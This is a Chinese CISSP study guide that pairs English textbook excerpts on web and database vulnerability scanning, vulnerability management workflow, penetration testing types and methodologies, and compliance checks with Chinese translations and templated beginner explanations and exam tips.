排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
漏洞扫描 漏洞扫描用工具找已知弱点。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 26 / PDF P1054

第 1054 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 15.5 Web application vulnerability scan of the same web server that was port scanned in Figure 15.1 and network vulnerability scanned in Figure 15.2

中文直译 / 整理

图 15.5 对在图 15.1 中进行端口扫描和在图 15.2 中进行网络漏洞扫描的同一 Web 服务器进行的 Web 应用程序漏洞扫描

小白解释

场景先行:你是公司的安全负责人,正在读第 1054 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1054 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 27 / PDF P1055

第 1055 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Do network vulnerability scans and web vulnerability scans sound similar? That's because they are! Both probe services running on a server for known vulnerabilities. The difference is that network vulnerability scans generally don't dive deep into the structure of web applications, whereas web application scans don't look at services other than those supporting web services. Many network vulnerability scanners do perform basic web vulnerability scanning tasks, but deep-dive web vulnerability scans require specialized, dedicated web vulnerability scanning tools.

You may have noticed that the same vulnerability scanner performed both the network vulnerability scan shown in Figure 15.4 and the web vulnerability scan shown in Figure 15.5. This is an example of a hybrid tool that can perform both types of scan. As with most tools, the capabilities for various vulnerability scanners vary quite a bit. Before using a scanner, you should research it to make sure it meets your security control objectives. Web vulnerability scans are an important component of an organization's security assessment and testing program.

It's a good practice to run scans in the following circumstances: Scan all applications when you begin performing web vulnerability scanning for the first time. This will detect issues with legacy applications. Scan any new application before moving it into a production environment for the first time. Scan any modified application before the code changes move into production. Scan all applications on a recurring basis. Limited resources may require scheduling these scans based on the priority of the application. For example, you may wish to scan web applications that interact with sensitive information more often than those that do not.

In some cases, web application scanning may be required to meet compliance requirements. For example, the Payment Card Industry Data Security

中文直译 / 整理

网络漏洞扫描和Web漏洞扫描听起来很相似? 这是因为它们确实如此! 两者都会探测服务器上运行的服务以查找已知漏洞。 区别在于,网络漏洞扫 描通常不会深入探究Web应用程序的结构,而Web应用扫描则不会查看除 支持Web服务之外的其他服务。 许多网络漏洞扫描器确实会执行基本的 Web漏洞扫描任务,但深入的Web漏洞扫描需要专用的Web漏洞扫描工具。 你可能已经注意到,执行图15.4中所示网络漏洞扫描和图15.5中所示 Web漏洞扫描的是同一个漏洞扫描器。 这是一个能够执行两种类型扫描 的混合工具示例。 与大多数工具一样,各种漏洞扫描器的功能差异很大。 在使用扫描器之前, 您应对其进行研究,以确保其符合您的安全控制目标。 Web漏洞扫描是组织安全评估和测试计划的重要组成部分。 在以下情况下运 行扫描是一种良好实践: 首次执行Web漏洞扫描时,扫描所有应用程序。 这将检测遗留 应用程序的问题。 首次将任何新应用程序移入生产环境前,请对其进行扫描。 在任何修改后的应用程序代码变更移入生产环境前,请对其进行扫描。 扫描所有a pppplications on a recurrin g 基础。

有限的资源可能 y 需要 根据应用程序的优先级安排这些扫描。 例如 您可能希望更频繁地扫描与敏感信息交互的Web应用程序,而不是不交互的那 些。 在某些情况下,需要进行Web应用程序扫描以满足合规要求。 例如,支付卡行业数 据安全

小白解释

场景先行:你是公司的安全负责人,正在读第 1055 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1055 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 28 / PDF P1056

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Standard (PCI DSS), discussed in Chapter 4, “Laws, Regulations, and Compliance,” requires that organizations either perform web application vulnerability scans at least annually or install dedicated web application firewalls to add additional layers of protection against web vulnerabilities. OWASP provides a list of open source and commercial tools commonly used for web application vulnerability scanning at https://owasp.org/wwwcommunity/Vulnerability_Scanning_Tools. Database Vulnerability Scanning Databases contain some of an organization's most sensitive information and are lucrative targets for attackers.

Although most databases are protected from direct external access by firewalls, web applications offer a portal into those databases, and malicious actors may leverage database-backed web applications to direct attacks against databases, including SQL injection attacks. SQL injection attacks and other web application vulnerabilities are discussed in more detail in Chapter 21. Database security issues are covered in Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures.” Database vulnerability scanners are tools that allow security professionals to scan both databases and web applications for vulnerabilities that may affect database security.

Sqlmap is a commonly used open source database vulnerability scanner and penetration testing tool that allows security administrators to probe web applications for database vulnerabilities and exploit vulnerabilities that do exist. Figure 15.6 shows an example of Sqlmap scanning a web application.

中文直译 / 整理

标准(PCI DSS),参见第4章,“法律法规与合规性”要求组织每年至少 执行一次Web应用程序漏洞扫描,或安装专用的Web应用程序防火墙,以 增加对Web漏洞的额外保护层。 OWASP 提供了一份常用于 Web 应用程序漏洞扫描的开源和商业工具列表,地址 为 https://owasp.org/www‑ 社区/漏洞扫描工具。 _ _ 数据库漏洞扫描 数据库包含组织最敏感的一些信息,是攻击者极具吸引力的目标。 尽管大多数 数据库通过防火墙受到保护,防止直接外部访问,但 Web 应用程序为这些数 据库提供了入口,恶意行为者可能利用基于数据库的 Web 应用程序对数据库 发起直接攻击,包括 SQL 注入攻击。 SQL 注入攻击和其他 Web 应用程序漏洞在 第 21 章中有更详细 的讨论。 数据库安全问题在 第 9 章“安全漏洞、威胁与对策”中进 行了介绍。 数据库漏洞扫描器是允许安全专业人员扫描数据库和Web应用程序以发现可能 影响数据库安全的漏洞的工具。 Sqlmap是一种常用开源的数据库漏洞扫描器 和渗透测试工具,允许安全管理员探测Web应用程序中的数据库漏洞并利用已 存在的漏洞。

图15.6展示了Sqlmap扫描Web应用程序的示例。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

NIST:NIST 提供美国常用安全标准、框架和指南。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

标准:标准给出必须满足的最低要求。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

信用卡/持卡人数据场景优先想到 PCI DSS。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
NIST NIST 提供美国常用安全标准、框架和指南。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 29 / PDF P1057

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 15.6 Scanning a database-backed application with Sqlmap Vulnerability Management Workflow Organizations that adopt a vulnerability management system should also develop a workflow approach to managing vulnerabilities. The basic steps in this workflow should include the following: 1. Detection: The initial identification of a vulnerability normally takes place as the result of a vulnerability scan. 2. Validation: Once a scanner detects a vulnerability, administrators should confirm the vulnerability to determine that it is not a false positive report. 3. Remediation: Validated vulnerabilities should then be remediated.

This may include applying a vendor-supplied security patch, modifying a device configuration, implementing a workaround to avoid the vulnerability, or installing a web application firewall or other control that prevents the exploitation of the vulnerability. The goal of a workflow approach is to ensure that vulnerabilities are detected and resolved in an orderly fashion. The workflow should also include steps

中文直译 / 整理

图 15.6 使用 Sqlmap 扫描基于数据库的应用程序 漏洞管理流程 采用漏洞管理系统的组织还应制定一套管理漏洞的工作流程。 该工作流程的 基本步骤应包括以下内容: 1. 检测:漏洞的初步识别通常通过漏洞扫描实现。 2. 验证:扫描器检测到漏洞后,管理员应确认该漏洞,以确定其并非误报。 3. 修复:经验证的漏洞应予以修复。 这可能包括应用供应商提供的安全补丁、 修改设备配置、实施规避漏洞的临时方案,或安装 Web 应用防火墙或其他 控制措施以防止漏洞被利用。 工作流方法的目标是确保漏洞以有序的方式被发现和解决。 工作流还应包括步骤

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 30 / PDF P1058

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

that prioritize vulnerability remediation based on the severity of the vulnerability, the likelihood of exploitation, and the difficulty of remediation. You'll find more discussion of the vulnerability management process in Chapter 16, “Managing Security Operations.” Penetration Testing The penetration test goes beyond vulnerability testing techniques because it actually attempts to exploit systems. Vulnerability scans merely probe for the presence of a vulnerability and do not normally take offensive action against the targeted system.

(That said, some vulnerability scanning techniques may disrupt a system, although these options are usually disabled by default.) Security professionals performing penetration tests, on the other hand, try to defeat security controls and break into a targeted system or application to demonstrate the flaw. Penetration tests require focused attention from trained security professionals, to a much greater extent than vulnerability scans. When performing a penetration test, the security professional typically targets a single system or set of systems and uses many different techniques to gain access.

NIST SP 800-115—Technical Guide to Information Security Testing and Assessment defines the penetration testing process as consisting of the four phases illustrated in Figure 15.7: Planning includes agreement on the scope of the test and the rules of engagement. This is an extremely important phase because it ensures that both the testing team and management are in agreement about the nature of the test and that the test is explicitly authorized. Discovery includes (1) information gathering and scanning and (2) vulnerability analysis. It uses manual and automated tools to collect information about the target environment.

This includes performing basic reconnaissance to determine system function (such as visiting websites hosted on the system) and conducting network discovery scans to identify open ports. Testers also use automated tools during this phase to probe for system weaknesses using network vulnerability scans, web vulnerability scans, and database vulnerability scans. Attack seeks to use manual and automated exploit tools to attempt to defeat system security. This step is where penetration testing goes

中文直译 / 整理

根据漏洞的严重性、被利用的可能性以及修复的难度来优先处理漏洞修复。 您 将在第16章“安全管理运营”中找到更多关于漏洞管理过程的讨论。 渗透测试 渗透测试超越了漏洞检测技术,因为它实际上会尝试利用系统。 漏洞扫描仅探 测漏洞是否存在,通常不会对目标系统采取主动攻击行为。 (尽管如此,某些 漏洞扫描技术可能会干扰系统,但这些选项通常默认禁用。 )另一方面,执行 渗透测试的安全专业人员会尝试绕过安全控制措施,入侵目标系统或应用程序, 以证明其缺陷的存在。 渗透测试需要经过培训的安全专业人员投入高度集中的注意力,其程度远超 漏洞扫描。 在执行渗透测试时,安全专业人员通常会针对单个系统或一组系 统,并使用多种不同技术获取访问权限。 NISTSP800-115—信息安全管理测 试与评估技术指南将渗透测试过程定义为包含图图15.7所示的四个阶段: 规划包括就测试范围和参与规则达成一致。 这是一个极为重要的阶段, 因为它确保测试团队和管理层就测试的性质达成一致,并明确授权该测 试。 发现包括(1)信息收集与扫描和(2) vulnerabilit y analysis。 它使用手动和自动化工具收集 有关目标环境的信息。

这包括执行基本侦察以确定系统功能(例如访问托 管在系统上的网站)以及进行网络发现扫描以识别开放端口。 测试人员在 此阶段还使用自动化工具,通过网络漏洞扫描、Web漏洞扫描和数据库漏 洞扫描来探测系统弱点。 攻击旨在使用手动和自动化渗透工具尝试突破系统安全。 此步骤使渗透测 试超越了漏洞扫描,因为漏洞扫描并不会尝试实际利用已发现的漏洞。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 31 / PDF P1059

第 1059 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

beyond vulnerability scanning, as vulnerability scans do not attempt to actually exploit detected vulnerabilities. Reporting summarizes the results of the penetration testing and makes recommendations for improvements to system security. FIGURE 15.7 Penetration testing process Penetration testers commonly use a tool called Metasploit Framework to automatically execute exploits against targeted systems. Metasploit Framework, shown in Figure 15.8, uses a scripting language to allow the automatic execution of common attacks, saving testers (and malicious actors) quite a bit of time by eliminating many of the tedious, routine steps involved in executing an attack.

beyond vulnerability scanning, as vulnerability scans do not attempt to actually exploit detected vulnerabilities.

中文直译 / 整理

报告总结了渗透测试的结果,并对系统安全的改进提出了建议。 图15.7渗透测试过程 渗透测试人员通常使用一种名为Metasploit Framework的工具来自动对目标系 统执行漏洞利用。 如图15.8所示,Metasploit Framework 使用脚本语言来实 现常见攻击的自动化执行,通过消除执行攻击过程中许多繁琐的常规步骤,为 测试人员(和恶意攻击者)节省了大量时间。

小白解释

场景先行:你是公司的安全负责人,正在读第 1059 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

漏洞扫描:漏洞扫描用工具找已知弱点。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1059 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

扫描发现弱点,不等于已经成功利用。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 32 / PDF P1060

第 1060 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 15.8 The Metasploit Framework automated system exploitation tool allows attackers to quickly execute common attacks against target systems. Penetration testers may be company employees who perform these tests as part of their duties or external consultants hired to perform penetration tests. The tests are normally categorized into three groups: White-Box Penetration Test Provides the attackers with detailed information about the systems they target. This bypasses many of the reconnaissance steps that normally precede attacks, shortening the time of the attack and increasing the likelihood that it will find security flaws. These tests are sometimes called “known environment” tests.

Gray-Box Penetration Test Also known as partial knowledge tests, these are sometimes chosen to balance the advantages and disadvantages of whiteand black-box penetration tests. This is particularly common when black-box results are desired but costs or time constraints mean that some knowledge is needed to complete the testing. These tests are sometimes called “partially known environment” tests.

中文直译 / 整理

图 15.8 Metasploit Framework 自动化系统渗透工具允许攻击者快速对目标执行 常见攻击 系统。 渗透测试人员可能是公司员工,作为其职责的一部分执行这些测试,也可能是 被聘请来执行渗透测试的外部顾问。 这些测试通常分为三类: 白盒渗透测试 向攻击者提供有关其目标系统的详细信息。 这绕过了通常在攻 击前进行的许多侦察步骤,缩短了攻击时间并提高了发现安全漏洞的可能性。 这些测试有时被称为“已知环境”测试。 灰盒渗透测试 也称为部分知识测试,有时会选择此类测试以平衡白盒和黑盒渗透 测试的优缺点。 当希望获得黑盒测试结果,但成本或时间限制要求具备一定知识 才能完成测试时,这种情况尤为常见。 这些测试有时被称为“部分已知环境”测 试。

小白解释

场景先行:你是公司的安全负责人,正在读第 1060 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1060 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 33 / PDF P1061

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Black-Box Penetration Test Does not provide attackers with any information prior to the attack. This simulates an external attacker trying to gain access to information about the business and technical environment before engaging in an attack. These tests are sometimes called “unknown environment” tests. Organizations performing penetration testing should be careful to ensure that they understand the hazards of the testing itself. Penetration tests seek to exploit vulnerabilities and consequently may disrupt system access or corrupt data stored in systems.

This is one of the major reasons that it is important to clearly outline the rules of engagement during the planning phase of the test as well as have complete authorization from a senior management level prior to starting any penetration testing. Breach and Attack Simulations Breach and attack simulation (BAS) platforms seek to automate some aspects of penetration testing. These systems are designed to inject threat indicators onto systems and networks in an effort to trigger other security controls. For example, a BAS platform might place a suspicious file on a server, send beaconing packets over a network, or probe systems for known vulnerabilities.

In a well-functioning security program, detection and prevention controls would immediately detect and/or block this traffic as potentially malicious. The BAS platform is not actually waging attacks, but it is conducting automated testing of those security controls to identify deficiencies that may indicate the need for control updates or enhancements. Penetration tests are time-consuming and require specialized resources, but they play an important role in the ongoing operation of a sound information security testing program.

中文直译 / 整理

黑盒渗透测试 在攻击前不向攻击者提供任何信息。 这模拟了外部攻击者在发动 攻击前试图获取有关业务和技术环境的信息。 这些测试有时被称为“未知环境” 测试。 执行渗透测试的组织应谨慎确保充分理解测试本身所带来的风险。 渗透测试旨 在利用漏洞,因此可能中断系统访问或破坏系统中存储的数据。 这正是为何在 测试规划阶段明确界定参与规则,并在启动任何渗透测试之前获得高级管理层 完全授权至关重要的主要原因之一。 入侵与攻击模拟 入侵与攻击模拟(BAS)平台旨在自动化渗透测试的某些方面。 这些系统设 计用于向系统和网络注入威胁指标,以触发其他安全控制措施。 例如, BAS平台可能在服务器上放置一个可疑文件、通过网络发送信标数据包,或 探测系统是否存在已知漏洞。 在运行良好的安全项目中,检测和预防控制措施会立即检测到并/或阻止此 类流量,将其视为潜在恶意行为。 BAS平台实际上并未发动攻击,而是对 这些安全控制措施进行自动化测试,以识别可能表明需要更新或增强控制 措施的缺陷。 渗透测试耗时且需要专业资源,但在持续运行健全的信息安全测试计划中起着 重要作用。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

授权:授权是认证之后决定你能访问什么、能做什么。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

认证成功不等于什么都能做;权限仍要单独授权。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
授权 授权是认证之后决定你能访问什么、能做什么。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 34 / PDF P1062

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

There are many industry-standard penetration testing methodologies that make a good starting point when designing your own program. Consider using the OWASP Web Security Testing Guide, Open Source Security Testing Methodology Manual (OSSTMM), NIST 800-115 — FedRAMP Penetration Test Guidance, or PCI DSS Information Supplement on Penetration Test Guidance v3 as references. Compliance Checks Organizations find themselves subject to a wide variety of compliance requirements. You learned about many of these laws and regulations in Chapter 4.

Savvy organizations create and maintain compliance plans documenting each of their regulatory obligations and map those to the specific security controls designed to satisfy each objective. Compliance checks are an important part of security testing and assessment programs for regulated firms. These checks verify that all of the controls listed in a compliance plan are functioning properly and are effectively meeting regulatory requirements. Performing these checks on a periodic basis maintains the health of the organization's compliance program and avoids unforeseen regulatory issues. Testing Your Software Software is a critical component in system security.

Think about the following characteristics common to many applications in use throughout the modern enterprise: Software applications often have privileged access to the operating system, hardware, and other resources. Software applications routinely handle sensitive information, including credit card numbers, Social Security numbers, and proprietary business information. Many software applications rely on databases that also contain sensitive information.

中文直译 / 整理

在设计您自己的计划时,有许多行业标准的渗透测试方法论可以作为良 好的起点。 建议使用 OWASP Web 安全测试指南,Open Source Securit y Testin g Methodolo gy 手动 (OSSTMM),NIST 800‑115 —— FedRAMP 渗透测试指南 , 或 PCI DSS 信息 补充指南 v3 作为参考。 合规性检查 组织面临着各种各样的合规要求。 您在第4章中了解了其中许多法律法规。 精明的组织会制定并维护合规计划,记录每一项监管义务,并将其映射到为实 现每项目标而设计的具体安全控制措施上。 合规性检查是受监管企业安全测试和评估计划的重要组成部分。 这些检查验 证合规计划中列出的所有控制措施是否正常运行,并有效满足监管要求。 定 期执行这些检查有助于维持组织合规计划的健康状态,避免出现意外的监管 问题。 测试您的软件 软件是系统安全的关键组成部分。 请思考现代企业中许多应用程序普遍具有的 以下特征: 软件应用程序通常对操作系统、硬件和其他资源具有特权访问权限。 软件应用程序经常处理敏感信息,包括信用卡号、社会安全号码和专有 业务信息。

许多软件应用程序依赖于也包含敏感信息的数据库。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

